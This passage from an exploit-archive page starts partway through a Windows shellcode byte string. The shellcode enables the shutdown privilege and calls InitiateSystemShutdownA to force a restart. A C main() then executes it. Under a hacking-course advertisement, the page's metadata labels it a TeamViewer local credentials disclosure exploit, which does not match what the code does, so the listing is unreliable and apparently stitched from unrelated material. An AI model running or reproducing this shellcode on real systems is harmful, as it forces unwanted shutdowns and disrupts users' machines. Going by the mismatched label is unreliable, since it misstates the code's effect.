31\xc9\x68\x73\x41\x41\x41\x88\x4c\x24\x01\x68\x6c\x65\x67\x65\x68\x72\x69\x76\x69\x68\x6b\x65\x6e\x50\x68\x73\x74\x54\x6f\x68\x41\x64\x6a\x75\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x14\x31\xc9\x68\x77\x6e\x41\x42\x88\x4c\x24\x03\x68\x75\x74\x64\x6f\x68\x65\x6d\x53\x68\x68\x53\x79\x73\x74\x68\x69\x61\x74\x65\x68\x49\x6e\x69\x74\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x18\x31\xc0\x50\x83\xec\x14\x8d\x3c\x24\x8b\x46\x08\xff\xd0\x31\xd2\x8d\x17\x52\x31\xc9\xb1\x28\x51\x50\x8b\x4e\x04\xff\xd1\x8d\x57\x04\x8d\x52\x04\x8d\x12\x31\xc9\x68\x65\x67\x65\x41\x88\x4c\x24\x03\x68\x69\x76\x69\x6c\x68\x77\x6e\x50\x72\x68\x75\x74\x64\x6f\x68\x53\x65\x53\x68\x8d\x0c\x24\x31\xdb\x52\x51\x53\x8b\x5e\x10\xff\xd3\x8d\x57\x04\x31\xc9\x41\x89\x0a\x8d\x52\x04\x41\x89\x4a\x08\x31\xd2\x52\x52\x52\x8d\x57\x04\x52\x31\xd2\x52\x8b\x17\x52\x8b\x56\x14\xff\xd2\x31\xc9\x51\x68\x6e\x64\x73\x21\x68\x73\x65\x63\x6f\x68\x41\x20\x33\x20\x68\x6d\x2e\x45\x54\x68\x79\x73\x74\x65\x68\x6e\x67\x20\x53\x68\x61\x72\x74\x49\x68\x52\x65\x73\x74\x8d\x1c\x24\x41\x51\x31\xc9\x51\xb1\x03\x51\x53\x31\xc9\x51\x8b\x4e\x18\xff\xd1\x8b\x4e\x0c\x50\xff\xd1";

main()
{
printf("shellcode lenght %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}

www.extremehacking.org

Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India

Full title	TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure Exploit
Date add	08-09-2016
Category	local exploits
Platform	windows
Risk	Security Risk High